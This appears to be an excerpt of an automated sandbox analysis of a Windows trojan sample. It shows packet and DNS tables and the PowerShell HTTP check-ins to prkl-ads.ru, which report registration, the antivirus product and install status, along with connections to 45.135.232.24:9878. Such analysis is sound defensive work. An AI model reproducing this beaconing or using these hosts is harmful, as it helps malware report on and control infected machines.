Aug 21, 2023 19:35:21.570060015 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.602030039 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.602075100 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.730031967 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.730357885 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.741868973 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.741894960 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.742410898 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.789148092 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.834806919 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.971314907 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.971460104 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:21.971714020 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.974299908 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:23.981787920 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:23.981858015 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:23.982044935 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:23.984397888 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:23.984428883 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.116677046 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.116874933 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.120498896 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.120522976 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.120866060 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.125458956 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.166914940 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.243397951 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.243763924 CEST | 443 | 49724 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.243889093 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.262736082 CEST | 49724 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.294485092 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.294569016 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.294684887 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.295591116 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.295627117 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.407994986 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.413261890 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.413311005 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.565537930 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.565699100 CEST | 443 | 49725 | 81.177.140.69 | 192.168.2.3
Aug 21, 2023 19:35:24.565862894 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:24.566409111 CEST | 49725 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:46.966348886 CEST | 49735 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:47.031122923 CEST | 9878 | 49735 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:47.031245947 CEST | 49735 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:47.972649097 CEST | 49735 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:48.127202034 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:48.188019037 CEST | 9878 | 49736 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:48.188193083 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:48.188934088 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:48.246918917 CEST | 9878 | 49736 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:48.300309896 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.013900042 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.074237108 CEST | 9878 | 49736 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:51.115629911 CEST | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.358385086 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.418598890 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:51.418926001 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.419022083 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.481524944 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:51.481894016 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:51.542574883 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:51.597395897 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:54.854691029 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:54.924170971 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924206018 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924227953 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924276114 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924284935 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:54.924310923 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924329042 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:35:54.924422979 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:35:54.924422979 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:36:10.584383965 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:36:10.649682045 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.649722099 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.649744987 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.650006056 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:36:10.712760925 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.712794065 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.713031054 CEST | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:36:10.713046074 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.713073015 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:36:10.713088989 CEST | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713104963 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713206053 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.713248968 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713258028 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713267088 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713275909 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.713510036 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773221970 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773261070 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773283958 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773303986 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773322105 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773343086 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773365974 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773385048 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773403883 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773423910 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773442984 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773464918 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773475885 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773499966 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773520947 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773575068 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773646116 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773667097 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773689032 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773833036 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773854017 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773873091 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773900986 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773993015 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.774013996 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.774063110 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837270021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837311983 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837335110 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837475061 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.837728024 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837750912 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837771893 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837899923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837924004 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837943077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837963104 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838620901 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838649988 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838670015 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838685989 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838705063 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838726044 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838747025 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838766098 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.839039087 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.839152098 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.841137886 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841166973 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841187000 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841204882 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841640949 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841662884 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841834068 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841852903 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841871977 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842402935 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842426062 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842443943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899491072 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899532080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899554968 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899574041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899593115 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899935007 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899954081 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899956942 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.899971962 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899992943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900064945 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.900156021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900177956 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900197983 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900218010 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900238037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900259018 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900276899 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900296926 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900320053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900340080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900360107 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900379896 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900399923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900727034 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.900804996 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.960346937 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960383892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960402012 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960419893 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960438013 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960457087 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960542917 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960561991 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960580111 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960674047 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960694075 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960750103 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960854053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960875034 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960894108 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961126089 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961198092 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961244106 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961282969 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961427927 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961456060 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961482048 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961507082 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961544037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961589098 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961616993 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152152061 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152198076 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152242899 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152291059 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152338028 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152384043 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152432919 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152477026 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152520895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152734041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152779102 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152828932 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152874947 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152919054 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152965069 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153011084 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153064013 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153112888 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153160095 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213267088 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213311911 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213347912 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213540077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213572025 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213603973 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213754892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213779926 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213869095 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214453936 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214529037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214596987 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214736938 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214809895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214884043 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214926958 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.216856003 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.249594927 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.302247047 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:34.271972895 CEST497379878192.168.2.345.135.232.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 21, 2023 19:35:21.405807972 CEST | 60000 | 53 | 192.168.2.3 | 8.8.8.8
Aug 21, 2023 19:35:21.497184992 CEST | 53 | 60000 | 8.8.8.8 | 192.168.2.3
Aug 21, 2023 19:35:23.815943003 CEST | 54193 | 53 | 192.168.2.3 | 8.8.8.8
Aug 21, 2023 19:35:23.979336023 CEST | 53 | 54193 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 21, 2023 19:35:21.405807972 CEST | 192.168.2.3 | 8.8.8.8 | 0xfa03 | Standard query (0) | prkl-ads.ru | A (IP address) | IN (0x0001) | false
Aug 21, 2023 19:35:23.815943003 CEST | 192.168.2.3 | 8.8.8.8 | 0x36a8 | Standard query (0) | prkl-ads.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 21, 2023 19:35:21.497184992 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa03 | No error (0) | prkl-ads.ru | - | 81.177.140.69 | A (IP address) | IN (0x0001) | false
Aug 21, 2023 19:35:23.979336023 CEST | 8.8.8.8 | 192.168.2.3 | 0x36a8 | No error (0) | prkl-ads.ru | - | 81.177.140.69 | A (IP address) | IN (0x0001) | false
• prkl-ads.ru
Session ID: 0
Source IP: 192.168.2.3
Source Port: 49723
Destination IP: 81.177.140.69
Destination Port: 443
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

2023-08-21 17:35:21 UTC, 0 kBytes transferred, OUT:
GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru
Connection: Keep-Alive

2023-08-21 17:35:21 UTC, 0 kBytes transferred, IN:
HTTP/1.1 200 OK
Date: Mon, 21 Aug 2023 17:35:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33

Session ID: 1
Source IP: 192.168.2.3
Source Port: 49724
Destination IP: 81.177.140.69
Destination Port: 443
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

2023-08-21 17:35:24 UTC, 0 kBytes transferred, OUT:
GET /?status=start&av=Windows%20Defender HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru

2023-08-21 17:35:24 UTC, 0 kBytes transferred, IN:
HTTP/1.1 200 OK
Date: Mon, 21 Aug 2023 17:35:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33

Session ID: 2
Source IP: 192.168.2.3
Source Port: 49725
Destination IP: 81.177.140.69
Destination Port: 443
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

2023-08-21 17:35:24 UTC, 0 kBytes transferred, OUT:
GET /?status=install HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru

2023-08-21 17:35:24 UTC, 0 kBytes transferred, IN:
HTTP/1.1 200 OK
Date: Mon, 21 Aug 2023 17:35:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33

Target ID: 0
Start time: 19:35:12
Start date: 21/08/2023
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Imagebase: 0xbb0000
File size: 7'465'048 bytes
MD5 hash: 19124312CAFA0B1C5524329755A5D6A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 19:35:14
Start date: 21/08/2023
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff744670000
File size: 66'048 bytes
MD5 hash: 4767B71A318E201188A0D0A420C8B608
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 19:35:15
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 3407EF71A9E7EFAA675EDBEA938667C8 C
